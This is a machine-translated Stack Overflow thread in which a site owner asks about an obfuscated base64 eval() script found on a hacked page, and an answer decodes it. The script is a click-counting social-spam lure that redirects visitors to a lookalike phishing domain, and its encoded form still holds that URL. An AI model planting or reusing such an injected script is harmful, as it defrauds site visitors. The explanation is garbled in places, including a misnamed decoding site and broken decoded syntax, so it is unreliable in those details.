解码奇怪的JavaScript代码

时间:2018-05-21 22:39:48

标签: javascript

我对解码和编码了解不多,但我在我的网站上发现了这个(它被黑了,有人接管了我网站上的一个页面)。我分析了这个页面但是看不懂:

<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>

这是什么意思?我怎么读呢?

1 个答案:

答案 0 :(得分:4)

这是base64编码的代码片段,它将在运行时进行评估。

您的代码 

<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>

解码步骤(简单一步)

  1. GoTo base63decode.org
  2. 在atob块内复制代码。
  3. 将其粘贴到已编码的字符串块中,然后按解码。

    4. 解码代码 

    <script type="text/javascript">
eval(var c = 0;
$(document).ready(function() {
    $("#b1").on('click', function() {
        ++c;
        if (c > 15) {
            $(this).attr({
                href: "[ a phishing URL -- removed ]",
                target: "_self"
            });
        }
    });
    $("#b2").on('click', function() {
        if (c > 20) window.location = "[ a phishing URL -- removed ]";
        else window.alert("Deel aan 20 van je vrienden over WhatsApp de Adidas promotie!\n\n Je moet delen " + c);
    });
}););
</script>

    这是做什么

    第一个代码正在被解码,并且在具有唯一ID b1和b2的两个按钮上捕获事件并且基于点击次数决定正在发生位置变更或创建带有网络钓鱼网站条件的新选项卡时如果出现任何问题,您将在此按钮后点击15次点击,您将被导航到此URL,然后在20次点击后,将使用此URL生成一个新窗口。

相关问题
最新问题